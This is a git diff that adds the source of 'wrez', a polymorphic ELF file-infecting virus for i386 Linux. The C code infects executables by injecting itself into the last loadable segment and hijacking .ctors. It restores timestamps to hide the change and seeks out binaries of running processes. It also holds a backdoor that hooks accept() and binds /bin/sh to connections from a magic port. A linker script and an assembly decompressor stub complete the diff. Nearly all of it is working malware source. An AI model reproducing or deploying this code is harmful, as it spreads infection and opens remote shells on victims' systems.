+        /* did the .got entry change? (lazy binding)
+         */
+        CHAINEND;
+
+        return (rval);
+}
+#endif
+
+
+#ifdef  LOOKUP_LIBC_CALL_EXAMPLE
+static void
+ex_wrez_libc_call (wrconfig *cfg)
+{
+        char *  systemf;
+        char *  command;
+        int     (*system)(char *);
+
+
+        STRINGPTR (systemf, "system");
+        STRINGPTR (command, "uname -a;id;");
+
+        system = symbol_resolve ((void *) cfg->elf_base, systemf);
+        if (system != NULL)
+                system (command);
+}
+#endif
+
+
+#ifdef  LOOKUP_BACKDOOR_NETWORK_MAGIC
+static void
+backdoor_network (wrconfig *cfg)
+{
+        char *          acceptstr;
+        Elf32_Word *    acceptgot[8];
+        int             acg_wk; /* got walker */
+        void *          bd_accept;
+
+
+        memset (acceptgot, 0, sizeof (acceptgot));
+        STRINGPTR (acceptstr, "accept");
+
+        if (got_funcloc_array ((void *) cfg->elf_base, acceptstr, acceptgot, 8,
+                NULL) == 0)
+        {
+                return;
+        }
+
+        FUNCPTR (bd_accept, "backdoor_network_accept");
+
+        /* install all GOT redirections into the hook function as static data
+         */
+        PTRINSTALL_ARRAY (bd_accept, *(acceptgot[0]), cfg, acceptgot, "8");
+
+        for (acg_wk = 0 ; acg_wk < (sizeof (acceptgot) /
+                sizeof (acceptgot[0])) && acceptgot[acg_wk] != NULL ;
+                ++acg_wk)
+        {
+                *(acceptgot[acg_wk]) = (Elf32_Word) bd_accept;
+        }
+}
+
+
+static int
+backdoor_network_accept (int s, void *addr, int addr_len)
+{
+        int             (* chain)(int, void *, int);
+        int             retval;
+
+        CHAINSTART_M (chain, 8, "8");
+
+again:
+        CHAINCALL;
+        retval = chain (s, addr, addr_len);
+        CHAINEND_M;
+
+        /* check whether a socket has been caught, if so, call real backdoor
+         * function, else just bail out as the real accept did
+         *
+         * if it is a real backdoored connection, then try again, without
+         * looking suspecious
+         */
+        if (retval >= 0) {
+                if (backdoor_network_check (retval) != 0) {
+                        close (retval);
+
+                        goto again;
+                }
+        }
+
+        CHAINCALL;
+        return (retval);
+}
+
+
+/* return 0 if its no backdoored connection
+ * return != 0 if it is
+ */
+int
+backdoor_network_check (int sock)
+{
+        char *                  argv[2];
+        struct sockaddr_in      rm;     /* remote addr */
+        socklen_t               rm_l = sizeof (rm);
+        unsigned short          port;
+
+
+        if (getpeername (sock, &rm, &rm_l) != 0)
+                return (0);
+
+        port = ((rm.sin_port & 0xff) << 8) | ((rm.sin_port & 0xff00) >> 8);
+        if (port == MAGIC_PORT) {
+                if (fork () != 0)
+                        return (1);
+        } else
+                return (0);
+
+        /* backdoored child from hereon
+         */
+        STRINGPTR (argv[0], "/bin/sh");
+        argv[1] = NULL;
+        dup2 (sock, 0);
+        dup2 (sock, 1);
+        dup2 (sock, 2);
+        execve (argv[0], argv, NULL);
+        _exit (0);
+
+        return (0);
+}
+
+#endif
+
+
+/* isinfected
+ *
+ * test whether executeable file `filename' is already infected by wrez.
+ * this test may cause false-positives because we use no signature but a
+ * property of the program headers that could appear in normal files, too.
+ *
+ * return 0 if the file is not infected yet
+ * return != 0 if the file is either infected or we cannot tell (error?)
+ *      1 = infected or false positive
+ *     -1 = bug or cannot tell
+ */
+
+static int
+isinfected (char *filename)
+{
+        int             vfd,
+                        rval = -1;      /* return value, assume infected */
+        Elf32_Ehdr      veh;
+        Elf32_Phdr      vph;
+
+
+        vfd = open (filename, O_RDONLY, 0);
+        if (vfd < 0)
+                return (-1);
+
+        if (read (vfd, &veh, sizeof (veh)) != sizeof (veh))
+                goto bail;
+
+        if (veh.e_ident[EI_MAG0] != ELFMAG0 ||
+                veh.e_ident[EI_MAG1] != ELFMAG1 ||
+                veh.e_ident[EI_MAG2] != ELFMAG2 ||
+                veh.e_ident[EI_MAG3] != ELFMAG3)
+                goto bail;
+
+        if (veh.e_type != ET_EXEC || veh.e_machine != EM_386)
+                goto bail;
+
+        if (lseek (vfd, veh.e_phoff, SEEK_SET) == -1)
+                goto bail;
+
+        while (veh.e_phnum-- > 0) {
+                if (read (vfd, &vph, sizeof (vph)) != sizeof (vph))
+                        goto bail;
+
+                if (vph.p_type != PT_LOAD)
+                        continue;
+
+                if (vph.p_flags != (PF_W | PF_R))
+                        continue;
+
+                if (INFECTED_IS (vph.p_memsz)) {
+                        rval = 1;
+                } else {
+                        rval = 0;       /* not infected */
+                }
+
+                goto bail;
+        }
+
+bail:   close (vfd);
+
+        return (rval);
+}
+
+
+/* infect
+ *
+ * try to infect file `filename'. do not check whether it is already infected.
+ *
+ * our idea works like this:
+ *  1. find the last physical PT_LOAD segment
+ *  2. save everything behind that in the file
+ *  3. extend last PT_LOAD segment and inject ourself there
+ *  4. append everything saved behind us
+ *  5. fixup addresses for data behind us, which we assume to be only the
+ *     section header table and the .shstrtab section
+ *  6. increase PT_LOAD segments physical size so we get mapped too
+ *  7. redirect .ctors to our entry point so we seize control
+ *
+ * when mvfile is non-NULL, it is used to copy the file to this name before
+ * infecting it in case we cannot open the `filename' read/write. it will
+ * then infect the copy, unlinking the old file and then moving the mvfile to
+ * the old filename. this is necessary when infecting running processes
+ *
+ * return in any case
+ */
+
+static inline void
+infect (wrconfig *cfg, char *filename, char *mvfile)
+{
+        int             n,      /* temporary counter */
+                        vfd;    /* victim file descriptor */
+        Elf32_Ehdr      veh;
+        Elf32_Phdr      vph;
+        unsigned int    vlen;   /* victim file length */
+
+        Elf32_Phdr      vphlast;
+        unsigned int    ph_lastofs = 0; /* offset of _Phdr struct in file */
+        unsigned int    ph_lastphys = 0;/* last byte touched by PT_LOAD seg */
+
+        unsigned int    phtext_offset = 0,      /* used for .ctors scan */
+                        phtext_filesz = 0;
+
+        unsigned char * mbl;            /* memory block */
+        unsigned int    mbl_len;        /* length */
+
+        unsigned char * dpoly;          /* destination buffer for poly */
+        unsigned int    dpoly_len,      /* length of destination buffer */
+                        dpoly_used;     /* number of bytes used */
+#if 0
+        /* see below what this should be used for */
+                        img_ok_check;   /* magic value transport */
+#endif
+
+        Elf32_Shdr      seh;
+        unsigned int    ctors_virt = 0; /* virtual .ctors offset in process */
+        unsigned int    old_wrctors;
+
+        unsigned int    elf_base = 0,   /* virtual &elf_header[0] */
+                        old_elf_base;   /* temporary backup */
+
+        unsigned int    new_entry,      /* new entry point */
+                        new_displ,      /* displacement new/old */
+                        lastmem = 0;    /* last used memory at all in file */
+        unsigned char   wrchar = 0x00;  /* fill byte for .bss */
+
+        struct stat     ost;            /* old stat of file */
+        struct utimbuf  nutime;         /* new utime of infected file */
+        struct timeval  otval,          /* current time (to change it back) */
+                        ntval;          /* new timeval of infected file */
+
+        int             tfd = 0;        /* temporary fd for mvfile */
+        unsigned char   tcopy[64];      /* copy buffer used */
+
+
+        /* get timestamps to restore them afterwards
+         */
+        if (stat (filename, &ost) == -1)
+                return;
+
+        vfd = open (filename, O_RDWR, 0);
+
+        if (vfd < 0 && mvfile != NULL) {
+                vfd = open (filename, O_RDONLY, 0);
+                if (vfd < 0)
+                        return;
+
+                /* use some innocent looking mode here, in case things go
+                 * wrong later and the file sticks somewhere
+                 */
+                tfd = open (mvfile, O_CREAT | O_RDWR, 0755);
+                if (tfd < 0)
+                        return;
+
+                /* copy the old file (`filename', at vfd) to the newly created
+                 * one (`mvfile', at tfd)
+                 */
+                while ((n = read (vfd, tcopy, sizeof (tcopy))) > 0)
+                        write (tfd, tcopy, n);
+
+                /* in either case (error or not), close down the fd's used
+                 */
+                close (tfd);
+                close (vfd);
+
+                if (n < 0) {
+                        unlink (mvfile);
+                        return;
+                }
+
+#define OPERATE_ON_COPY_MARKER  0xffff
+                tfd = OPERATE_ON_COPY_MARKER;
+
+                vfd = open (mvfile, O_RDWR, 0);
+        }
+
+        /* no chance, even with moving?
+         */
+        if (vfd < 0)
+                return;
+
+
+        if (read (vfd, &veh, sizeof (veh)) != sizeof (veh))
+                goto bail;
+
+        /* find physical .ctors address
+         * requires section header table (.e_shoff != 0)
+         */
+        if (veh.e_shoff == 0)
+                goto bail;
+
+        if (lseek (vfd, veh.e_shoff, SEEK_SET) == -1)
+                goto bail;
+
+        for (n = 0 ; n < veh.e_shnum ; ++n) {
+                if (read (vfd, &seh, sizeof (seh)) != sizeof (seh))
+                        goto bail;
+
+                /* XXX: .bss has to be zeroed out even in the rtld already.
+                 *      hence we cannot activate through .ctors except we
+                 *      provide a zeroed-out array over whole .bss. sucks.
+                 */
+                if (seh.sh_addr != 0 &&
+                        (seh.sh_offset + seh.sh_size) > lastmem)
+                {
+                        lastmem = seh.sh_offset + seh.sh_size;
+                }
+
+                if (seh.sh_type != SHT_PROGBITS)
+                        continue;
+                if (seh.sh_size != 8)
+                        continue;
+                if (seh.sh_flags != (SHF_WRITE | SHF_ALLOC))
+                        continue;
+
+                /* first occurance is the .ctors section, so write its
+                 * physical position in the file down and abort search
+                 */
+                if (ctors_virt == 0)
+                        ctors_virt = seh.sh_addr;
+        }
+
+        /* failed to find .ctors section ?
+         */
+        if (ctors_virt == 0)
+                goto bail;
+
+
+        /* read in program headers, and find the last physical one.
+         */
+        if (lseek (vfd, veh.e_phoff, SEEK_SET) == -1)
+                goto bail;
+
+        for (n = 0 ; n < veh.e_phnum ; ++n) {
+                if (read (vfd, &vph, sizeof (vph)) != sizeof (vph))
+                        goto bail;
+
+                if (vph.p_type != PT_LOAD)
+                        continue;
+
+                /* starting at zero == includes elf header
+                 */
+                if (vph.p_offset == 0) {
+                        elf_base = vph.p_vaddr;
+
+                        /* we save this to better limit down the .ctors
+                         * calling code in the file. this may be especially
+                         * important for very large and or weird (c++ ?) files
+                         * since there may be multiple .ctors calling
+                         * occurances. anyway, its better to not scan the
+                         * entire file, but just the .text PT_LOAD segment
+                         */
+                        phtext_offset = vph.p_offset;
+                        phtext_filesz = vph.p_filesz;
+                }
+
+                if ((vph.p_offset + vph.p_filesz) > ph_lastphys) {
+                        ph_lastphys = vph.p_offset + vph.p_filesz;
+                        memcpy ((void *) &vphlast, (void *) &vph,
+                                sizeof (vphlast));
+
+                        ph_lastofs = veh.e_phoff + n * veh.e_phentsize;
+                }
+        }
+
+        /* get victim file length, and compute length of memory block to
+         * slide.
+         */
+        vlen = lseek (vfd, 0, SEEK_END);
+        mbl_len = vlen - ph_lastphys;
+
+        mbl = (unsigned char *) mmap ((void *) 0x06000000,
+                mbl_len, PROT_READ | PROT_WRITE,
+                MAP_PRIVATE | MAP_ANONYMOUS, 0, 0);
+
+        lseek (vfd, ph_lastphys, SEEK_SET);
+        if (read (vfd, mbl, mbl_len) != mbl_len)
+                goto bail2;
+
+        /* inject ourself at the end of the PT_LOAD segment:
+         *
+         * 0| datadatadata 1| \0\0\0\0\0\0\0 2| vdata 3| vpad 4|
+         *    +---.data--+    +----.bss----+
+         *
+         * 0| = ph_offset, with .data section
+         * 1| = ph_offset + old_ph_filesz, .bss section
+         * 2| = ph_offset + old_ph_memsz, virus data compressed
+         * 3| = ph_offset + new_ph_filesz, space for decompressed virus
+         * 4| = ph_offset + new_ph_memsz
+         */
+        if (lseek (vfd, ph_lastphys, SEEK_SET) != ph_lastphys)
+                goto bail2;
+
+        if ((lastmem - ph_lastphys) > 0) {
+                do {
+                        write (vfd, &wrchar, 1);
+                } while (lseek (vfd, 0, SEEK_CUR) < lastmem);
+        }
+
+        /* compute new entry point
+         */
+        new_entry = vphlast.p_vaddr + vphlast.p_memsz + sizeof (unsigned int);
+
+        /* generate a new polymorphic version of the virus, and write it to
+         * the victim file
+         *
+         * steps: - write correct .ctors address in new image
+         *        - get memory for polymorph version
+         *        - generate the polymorph version
+         *        - write .ctors to file
+         *        - write it to the file
+         *        - free the memory
+         *        - restore the .ctors addresses
+         */
+        old_wrctors = cfg->wr_oldctors;
+
+        /* XXX: the crt0.o behaviour changed from where it required +4 offset
+         * adjusting to +0. FIXME: make a reliable algo */
+        /* cfg->wr_oldctors = ctors_virt + 4; */
+        cfg->wr_oldctors = ctors_virt;
+
+        old_elf_base = cfg->elf_base;
+        cfg->elf_base = elf_base;
+
+        dpoly_len = WREZ_SIZE_COMP + 4096;
+        dpoly = (unsigned char *) mmap ((void *) 0x07000000,
+                dpoly_len, PROT_READ | PROT_WRITE,
+                MAP_PRIVATE | MAP_ANONYMOUS, 0, 0);
+
+        if ((int) dpoly == -1)
+                goto bail2;
+
+        dpoly_used = infect_image (cfg, dpoly, new_entry);
+
+#ifdef DOES_NOT_WORK
+/* FIXME: does not work because the virus copy generated here (at &dpoly[0]
+          is at a different address than in the final infected file. because
+          the poly engine (lime) has to know the final load-address of the
+          code, it is impossible to test the virus with it. too bad.
+*/
+        /* test whether polymorphistic code worked.
+         * this is a workaround, since the polyengine contains some small
+         * bugs which appear randomly and result in segfaults and illegal
+         * instructions. since we installed a signal handler for both, back
+         * in wrez.asm, if things go wrong here, we will pass control to
+         * the host executeable and the file will not be infected.
+         */
+        __asm__ __volatile__ ("
+                call *%%eax
+                nop
+                nop
+                nop
+                nop"
+                : "=a" (img_ok_check) : "a" (dpoly));
+
+        /* magic "worked" value. normally if something wents wrong, we do
+         * not even receive control anymore
+         */
+        if (img_ok_check != 0x60504030)
+                goto bail3;
+#endif
+
+        /* first write new .ctors, followed by the full polycode
+         */
+        if (write (vfd, (void *) &new_entry, sizeof (unsigned int)) !=
+                sizeof (unsigned int))
+                goto bail3;
+
+        if (write (vfd, (void *) dpoly, dpoly_used) != dpoly_used)
+                goto bail3;
+
+        munmap ((void *) dpoly, dpoly_len);
+
+        cfg->elf_base = old_elf_base;
+        cfg->wr_oldctors = old_wrctors;
+
+        /* write back saved block and fixup absolute address in elf header
+         * lseek(vfd,0,SEEK_CUR) is the new last physical byte touched by
+         * the PT_LOAD segment
+         */
+        new_displ = lseek (vfd, 0, SEEK_CUR) - ph_lastphys;
+        if (write (vfd, (void *) mbl, mbl_len) != mbl_len)
+                goto bail2;
+
+
+        if (veh.e_shoff > ph_lastphys) {
+                veh.e_shoff += new_displ;
+
+                if (lseek (vfd, 0, SEEK_SET) == -1)
+                        goto bail2;
+                if (write (vfd, (void *) &veh, sizeof (veh)) != sizeof (veh))
+                        goto bail2;
+        }
+
+        /* fixup section addresses in section header table
+         */
+        if (lseek (vfd, veh.e_shoff, SEEK_SET) == -1)
+                goto bail;
+
+        for (n = 0 ; n < veh.e_shnum ; ++n) {
+                if (read (vfd, &seh, sizeof (seh)) != sizeof (seh))
+                        goto bail2;
+
+                switch (seh.sh_type) {
+                case (SHT_NULL):
+                        break;
+                default:
+                        /* did we move anything non-runtime related ?
+                         */
+                        if (seh.sh_addr == 0 && seh.sh_offset >= ph_lastphys) {
+                                seh.sh_offset += new_displ;
+
+                                if (lseek (vfd, -sizeof(seh), SEEK_CUR) == -1)
+                                        goto bail2;
+
+                                write (vfd, &seh, sizeof (seh));
+                        }
+                        break;
+                }
+        }
+
+        /* patch last PT_LOAD segment header to load ourself into memory
+         * XXX: sizeof (unsigned int) is the ctors address we add.
+         */
+        vphlast.p_filesz += sizeof (unsigned int) +
+                dpoly_used + (lastmem - ph_lastphys);
+
+        /* XXX: we need space for the decompression, exactly WREZ_SIZE bytes */
+        if (vphlast.p_memsz < (vphlast.p_filesz + WREZ_SIZE - cfg->decomp_len))
+                vphlast.p_memsz = vphlast.p_filesz +
+                        WREZ_SIZE - cfg->decomp_len;
+
+        /* vphlast.p_memsz is the utter minimum we need for decompression and
+         * ourself. but we round it up a bit as infection marker. the macros
+         * INFECTED_SET and INFECTED_IS are used and can be tweaked for a good
+         * false-positive ratio.
+         */
+        INFECTED_SET (vphlast.p_memsz);
+
+        if (lseek (vfd, ph_lastofs, SEEK_SET) != ph_lastofs)
+                goto bail2;
+        if (write (vfd, &vphlast, veh.e_phentsize) != veh.e_phentsize)
+                goto bail2;
+
+        /* modify .ctors to make it call our virus on startup
+         */
+        fixup_ctors (vfd, ctors_virt, new_entry - sizeof (unsigned int),
+                phtext_offset, phtext_filesz);
+
+        munmap ((void *) mbl, mbl_len);
+        close (vfd);
+
+
+        /* if we infected a copy because the original binary is running, we
+         * overwrite the original binary now (or at least try to ;)
+         */
+        if (tfd == OPERATE_ON_COPY_MARKER) {
+                if (unlink (filename) != 0) {
+                        unlink (mvfile);
+
+                        return;
+                }
+
+                /* original is removed now, copy our infected binary over
+                 * it, then proceed as usual (restore filestamps and such)
+                 */
+                if (rename (mvfile, filename) != 0) {
+                        /* oops, we deleted the original binary, but fail now,
+                         * thats not good :( hm.. at least leave no trace then
+                         */
+                        unlink (mvfile);
+
+                        return;
+                }
+        }
+
+        /* restore timestamps on file
+         */
+        nutime.actime = ost.st_atime;
+        nutime.modtime = ost.st_mtime;
+        ntval.tv_sec = ost.st_ctime + 1;
+        ntval.tv_usec = 0;
+
+        if (utime (filename, &nutime) == -1)
+                goto bail2;
+
+        if (gettimeofday (&otval, 0) == -1)
+                goto bail2;
+
+        /* XXX: kludge, this will naturally fail when we are != uid 0
+         */
+        if (settimeofday (&ntval, 0) == -1)
+                goto bail2;
+
+        chown (filename, ost.st_uid, ost.st_gid);
+
+        /* TODO/FIXME: loop until correct time was set */
+        settimeofday (&otval, 0);
+
+        return;
+
+bail3:  munmap ((void *) dpoly, dpoly_len);
+bail2:  munmap ((void *) mbl, mbl_len);
+
+bail:   close (vfd);
+}
+
+
+/* infect_image
+ *
+ * create a proper new polymorph image of the virus at `dest'. there must
+ * be at least (4096 + virus-size) bytes at dest.
+ *
+ * return the number of bytes stored at dest
+ */
+
+static unsigned int
+infect_image (wrconfig *cfg, unsigned char *dest, unsigned long int new_entry)
+{
+        unsigned int    dn = 0;
+
+#ifdef POLYMORPHISM
+        unsigned int    lime_len;
+
+        dest[dn++] = 0x9c;      /* pushf */
+        dest[dn++] = 0x60;      /* pusha */
+
+        lime_len = lime_generate (cfg->wr_start, WREZ_SIZE_COMP,
+                &dest[dn], new_entry + dn, 0x0);
+
+        return (dn + lime_len);
+#else
+        dest[dn++] = 0x9c;      /* pushf */
+        dest[dn++] = 0x60;      /* pusha */
+
+        memcpy (&dest[dn], (void *) cfg->wr_start, WREZ_SIZE_COMP);
+
+        return (WREZ_SIZE_COMP + 2);
+#endif
+
+}
+
+
+/* fixup_ctors
+ *
+ * find and change any occurance of ctor walking code in crt0.o
+ *
+ * looks like:
+ *      00007457:BBB4350508                     mov       ebx,080535B4   
+ *      0000745C:833DB4350508FF                 cmp (d)   [+080535B4],-01
+ *      00007463:740C                           je        file:00007471 =>[2]
+ *      00007465:8B03                           mov       eax,[ebx]
+ *      00007467:FFD0                           call (d)  eax
+ *      00007469:83C3FC                         add (d)   ebx,-04  
+ *      0000746C:833BFF                         cmp (d)   [ebx],-01
+ *      0000746F:75F4                           jne       file:00007465
+ *
+ * file to scan for the code is already opened read-write at `vfd'. the old
+ * address thats stored in the code right now is `old_addr', we replace with
+ * `new_addr'. within the file, the possible space we should look at is from
+ * `startseek' to (`startseek' + `lenseek')
+ *
+ * return in any case
+ */
+
+static inline void
+fixup_ctors (int vfd, unsigned long int old_addr, unsigned long int new_addr,
+        unsigned int startseek, unsigned int lenseek)
+{
+        int             n,              /* temporary buffer walker */
+                        count = 0;      /* times we have seen the address */
+        unsigned int    spos;           /* filepos of &rbuf[0] */
+        unsigned char   rbuf[256];      /* streaming read buffer */
+
+
+        spos = startseek;
+
+        /* XXX: this is a bit of a kludge when we approach the end of the
+         *      space we have to search, we read over it by max (256 - 3)
+         *      bytes. but thats ok.
+         */
+        do {
+                if (lseek (vfd, spos, SEEK_SET) == -1)
+                        return;
+
+                if (read (vfd, rbuf, sizeof (rbuf)) == -1)
+                        return;
+
+                for (n = 0; n < (sizeof (rbuf) - 3) ; ++n) {
+                        if (*((unsigned int *) &rbuf[n]) == old_addr) {
+                                if (lseek (vfd, spos + n, SEEK_SET) == -1)
+                                        return;
+
+                                /* overwrite old static address with our
+                                 * address, then move ahead, over it
+                                 */
+                                write (vfd, &new_addr, sizeof (new_addr));
+                                n += 4;
+                                count++;
+                        }
+                }
+
+                spos += sizeof (rbuf) - 3;
+        } while (count < 2 && spos < (startseek + lenseek));
+
+        return;
+}
+
+
+/* look_user
+ *
+ * we are non-root, so our choices of infecting other binaries is limited.
+ * the most effective way to infect binaries that will be started even
+ * after reboots is to look for user-owned binaries. this is too time
+ * consuming, so we do it another way:
+ *
+ * 1. get a list of every running process
+ * 2. look whether the binary of the process is writeable by us
+ * 3. try to infect the binary (which requires some workarounds, see below)
+ *
+ * return 0 in case no victim was found
+ * return number of attempted infections (successful or failure) on success
+ */
+
+static inline int
+look_user (wrconfig *cfg)
+{
+        int             infect_count = 0;       /* number of attempted */
+        int             dfd;                    /* directory file descriptor */
+        unsigned char * t_proc;
+
+        struct dirent * dwlk;                   /* dirent walker */
+        int             d_count,                /* getdents return value */
+                        d_proc;                 /* processed data */
+        unsigned char   d_data[4096];           /* temporary dirent data */
+
+
+        STRINGPTR (t_proc, "/proc");
+
+        dfd = open (t_proc, O_RDONLY, 0);
+        if (dfd < 0)
+                return (0);
+
+        do {
+                dwlk = (struct dirent *) d_data;
+                d_count = getdents (dfd, dwlk, sizeof (d_data));
+
+                for (d_proc = 0 ; d_proc < sizeof (d_data) &&
+                        d_proc < d_count && dwlk->d_reclen != 0 ;
+                        d_proc += dwlk->d_reclen)
+                {
+                        look_user_proc (cfg, t_proc, dwlk->d_name);
+                        dwlk = (struct dirent *) (((unsigned char *) dwlk) +
+                                dwlk->d_reclen);
+                }
+        } while (d_count > 0);
+
+        close (dfd);
+
+        return (infect_count);
+}
+
+
+static inline int
+look_user_proc (wrconfig *cfg, char *t_proc, unsigned char *filename)
+{
+        int             mapfd;
+        unsigned char   tfname[128];
+        unsigned char * fwlk;
+        char *          tfnp;
+
+
+        for (fwlk = filename ; *fwlk != '\0' ; ++fwlk) {
+                /* when its not a process-directory, return immediatly
+                 */
+                if (*fwlk < '0' || *fwlk > '9')
+                        return (0);
+        }
+
+        /* XXX: a bit messy way of constructing "/proc/<pid>/maps"
+         */
+        memcpy (tfname, t_proc, 5);     /* "/proc" */
+        tfname[5] = '/';                /* "/proc/" */
+        memcpy (&tfname[6], filename, fwlk - filename);
+        STRINGPTR (tfnp, "/maps");
+        memcpy (&tfname[6 + fwlk - filename], tfnp, 6);
+
+        /* open the mapfile and extract the binary path out of it
+         */
+        mapfd = open (tfname, O_RDONLY, 0);
+        if (mapfd < 0)
+                return (0);
+
+        /* read until first slash '/'
+         */
+        fwlk = tfname;
+        for (*fwlk = '\0' ; read (mapfd, fwlk, 1) == 1 && *fwlk != '/' ; )
+                ;
+
+        /* empty maps (kernel processes)
+         */
+        if (*fwlk == '\0') {
+                close (mapfd);
+
+                return (0);
+        }
+
+        for (++fwlk ; fwlk < &tfname[sizeof (tfname) - 1] &&
+                read (mapfd, fwlk, 1) == 1 && *fwlk != '\n' ; ++fwlk)
+                ;
+        *fwlk = '\0';
+
+        close (mapfd);
+
+        /* FINAL:XXX: remove this in final build */
+        write (2, tfname, fwlk - tfname);
+        write (2, "\n", 1);
+
+        /* wow, after all this mess, we finally got the filename of a running
+         * process, lets see if its infected, if not, try to infect it
+         */
+        if (isinfected (tfname) == 0) {
+                STRINGPTR (tfnp, "clean\n");
+                write (2, tfnp, 6);
+        }
+
+        return (0);
+}
+
+
+/* its in here because of register poorness, hence we recycle the stack
+ * content and pass the pointer to it instead of trying to write a braindead
+ * inlined version
+ */
+
+static int
+mmap (void  *start, long length, int prot, int flags,
+        int fd, long offset)
+{
+        long    ret;
+
+        __asm__ __volatile__ (  "int    $0x80"
+                : "=a" (ret)
+                : "a" (__NR_mmap), "b" (&start));
+
+        return (ret);
+}
+
diff --git a/other/wrez/wrcore.o b/other/wrez/wrcore.o
new file mode 100644
index 0000000..34d6353
--- /dev/null
+++ b/other/wrez/wrcore.o
diff --git a/other/wrez/wrez b/other/wrez/wrez
new file mode 100755
index 0000000..fedc3c4
--- /dev/null
+++ b/other/wrez/wrez
diff --git a/other/wrez/wrez-link.lds b/other/wrez/wrez-link.lds
new file mode 100644
index 0000000..29e9ffb
--- /dev/null
+++ b/other/wrez/wrez-link.lds
@@ -0,0 +1,46 @@
+/* initial infector link description */
+
+OUTPUT_FORMAT("elf32-i386", "elf32-i386", "elf32-i386")
+OUTPUT_ARCH("i386")
+
+ENTRY(wrez_init)
+
+PHDRS
+{
+        text PT_LOAD FILEHDR PHDRS FLAGS (0x0007);      /* PF_R | PF_W | PF_X */
+        data PT_LOAD FLAGS (0x0006);                    /* PF_R | PF_W */
+}
+
+SECTIONS
+{
+        . = 0x06660000 ;
+        .text : {
+                wrez.o(.text)
+                wrcore.o(.text)
+#ifdef  POLYMORPHISM
+                lime-interface.o(.text)
+                lime.o(.text)
+#endif
+#ifdef  LOOKUP
+                lookup.o(.text)
+#endif
+#ifdef  INMEM
+                inmem.o(.text)
+#endif
+#ifdef  FINGERPRINT
+                fingerprint.o(.text)
+                crypto.o(.text)
+#endif
+                *(.text)
+                *(.rodata)
+                *(.data)
+        } : text
+
+        /* save calls to objcopy, huh */
+        /DISCARD/ : {
+                *(.bss)
+                *(.eh_frame)
+                *(.comment)
+                *(.note)
+        }
+}
diff --git a/other/wrez/wrez.2nd b/other/wrez/wrez.2nd
new file mode 100644
index 0000000..d28db5b
--- /dev/null
+++ b/other/wrez/wrez.2nd
diff --git a/other/wrez/wrez.2nd.compressed b/other/wrez/wrez.2nd.compressed
new file mode 100644
index 0000000..ebee470
--- /dev/null
+++ b/other/wrez/wrez.2nd.compressed
diff --git a/other/wrez/wrez.asm b/other/wrez/wrez.asm
new file mode 100644
index 0000000..7c725ff
--- /dev/null
+++ b/other/wrez/wrez.asm
@@ -0,0 +1,438 @@
+
+        GLOBAL  wrez_init
+        GLOBAL  wrcfg
+        GLOBAL  decompressor_start
+        GLOBAL  decompressor_end
+        GLOBAL  data_start
+
+        EXTERN  wrez_main
+        EXTERN  wrez_end
+
+
+pusha_size      equ     32
+
+%include "wrezdefs.inc"
+
+wrez_init:
+;       pushf           ; XXX: activate only without polymorphism
+;       pusha
+
+        ; XXX: this is a workaround to test whether to polymorphism
+        ;      engine worked properly. in wrcore.c we use a special
+        ;      instruction block (4* 0x90, nop) after the call to
+        ;      test whether it worked.
+; DISABLED FOR NOW
+;       mov     ebx, [esp + 0x20 + 4]
+;       mov     edx, [ebx]              ; instruction at retaddr
+;       cmp     edx, 0x90909090
+;       jne     dostub
+;       popa
+;       popf
+;       mov     eax, 0x60504030
+;       ret
+
+
+
+        ; XXX: align so that we do not overwrite parts of the wrcfg
+        ;      structure on final exit.
+;       times ((16) - $ + wrez_init) db 0x90
+
+dostub: call    decompressor_start
+
+wrcfg:
+
+wr_start:
+        dd      wrez_init       ; wr_start
+decomp_len:
+        dd      -1
+
+wr_oldctors:
+        dd      0x41414141
+elf_base:
+        dd      0x42424242
+
+victim: db      '/tmp/v'
+        times ((32+4) - $ + victim) db 0x0
+
+; decompress_to = wr_start + cmprlen + (decompressor_end - wrez_init)
+cmprlen:        dd      0x41414141
+llstuff:        db      0x40
+hl1stuff:       dw      0x41
+hl2stuff:       db      0x42
+hf2stuff:       db      0x43
+
+; ======================= real code start =========================
+
+decompressor_start:
+        ; get wrcfg structure
+        pop     ebp
+        push    ebp
+
+        ; XXX: this code is needed for polymorphic instantiations and
+        ;      shellcode-like invocations. in either case, we cannot expect
+        ;      to have the proper address already there.
+        mov     edi, ebp
+        sub     edi, (wrcfg - wrez_init)        ; virtual address of wrez_init
+        mov     [ebp + (wr_start - wrcfg)], edi
+
+        ; decompress_to = wr_start + cmprlen + (decompressor_end - wrez_init)
+        mov     edi, [ebp + (wr_start - wrcfg)]         ; wr_start
+        add     edi, (decompressor_end - wrez_init)
+        mov     esi, edi                                ; esi = compressed
+        add     edi, [ebp + (cmprlen - wrcfg)]          ; + cmprlen
+
+        push    edi             ; push edi for the final ret
+        push    dword [ebp + (hf2stuff - wrcfg)]
+        push    dword [ebp + (hl2stuff - wrcfg)]
+        push    dword [ebp + (hl1stuff - wrcfg)]
+        push    dword [ebp + (llstuff - wrcfg)]
+        pusha
+
+        xor     ebx, ebx
+        xor     ecx, ecx
+        xor     ebp, ebp
+        xor     eax, eax
+        cdq
+
+        ; esi = compressed data
+        ; edi = target buffer
+
+main_loop:
+eoff:   cmp     esi, [esp + pusha_size + 4 * 4] ; eof ?
+        jb      noquit                  ; Yepp -> Return to 100h
+
+        popa
+        add     esp, 4 * 4
+        ret             ; return to target buffer
+
+noquit: call    get_bit                 ; Compressed/uncompressed data next?
+        jc      compressed
+
+
+        ; Handle uncompressed data
+        mov     cl, 8                   ; Uncompressed -> Get next 8 bits
+        cdq                             ; No fix-ups (clear edx)
+
+        call    get_data                ; Get byte
+
+        xchg    eax, ebx                ; Store the byte
+        stosb
+
+        ;jmp is 5 bytes long, clc jnc is only 3, we win 2 bytes !
+        ;jmp     main_loop               ; Loop
+        ; TODO: use jump (2 bytes short)
+        jmp     main_loop
+
+
+        ; Handle compressed data
+compressed:
+ll:     mov     dl, byte [esp + pusha_size + 0] ; llstuff, Maximum number of bits in a row
+
+bit_loop:
+        call    get_bit                 ; Loop until CF = 0
+        jnc     c_getpos
+
+        inc     ecx                     ; Increase lenght
+        dec     edx                     ; Max number of bits read?
+        jnz     bit_loop                ; Nope -> Keep reading
+
+        sub     esp, 4
+        call    get_huffman             ; Yepp -> Get huffman-coded lenght
+        add     esp, 4
+        mov     ecx, ebx                ; Lenght must be in cx
+
+c_getpos:
+        jecxz   lenght_1                ; Lenght 1? -> Do something else....
+
+        push    ecx                     ; Save lengt
+        call    get_huffman             ; Get huffman-coded position
+        pop     ecx                     ; Restore lenght
+
+c_copy: push    esi                     ; Save old source
+
+        mov     esi, edi                ; Calculate new source offset
+        sub     esi, ebx
+
+        inc     ecx                     ; Fix lenght
+        rep movsb                       ; Copy duplicate data
+
